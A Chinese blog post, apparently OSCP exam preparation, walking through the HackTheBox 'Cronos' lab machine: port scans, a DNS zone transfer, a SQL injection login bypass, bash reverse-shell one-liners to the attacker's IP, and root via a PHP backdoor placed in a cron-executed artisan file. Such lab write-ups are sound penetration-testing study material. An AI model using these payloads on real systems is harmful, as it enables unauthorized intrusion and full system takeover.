EthanDoctor

OSCP备考_0x04_HackThBox靶机_Linux_cronos

Ethan医生6个月前靶场223

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.184.136 (扫描UDP)

image.png

image.png

看到80端口直接冲过去,发现了经典Apache2页面,然后进行dirb,dirbuster各种目录扫描,居然没有收获。

dig +short -x 10.129.184.136 @10.129.184.136

dig axfr cronos.htb @10.129.184.136  

image.png


登入存在账号:admin' or 1=1# SQL漏洞

image.png

发现代码执行

直接使用反弹shell

bash -c 'bash -i >& /dev/tcp/10.10.16.31/3333 0>&1'

image.png


image.png

开始操作提权

cat /etc/crontab

image.png

artisan有修改执行权限,那就再里面插入代码

image.png

直接删除挡案后上传本地的后门文件


<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.31/3334 0>&1'"); ?>

反弹后直接拿到ROOT

image.png

image.png






标签: OSCP
返回列表

上一篇:OSCP备考_0x03_HackThBox靶机_Linux_nibbles

下一篇:OSCP备考_0x05_HackThBox靶机_Linux_Nineveh

相关文章

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

OSCP备考_0x27_HackThBox靶机_Linux_ Admirer

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.128.76 (扫描TCP)nmap -sU --top-ports 100 ...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x41_HackThBox靶机_Windows_granny

OSCP备考_0x41_HackThBox靶机_Windows_granny

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.188 (扫描TCP)发现有webdav可以利用davtest -url htt...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号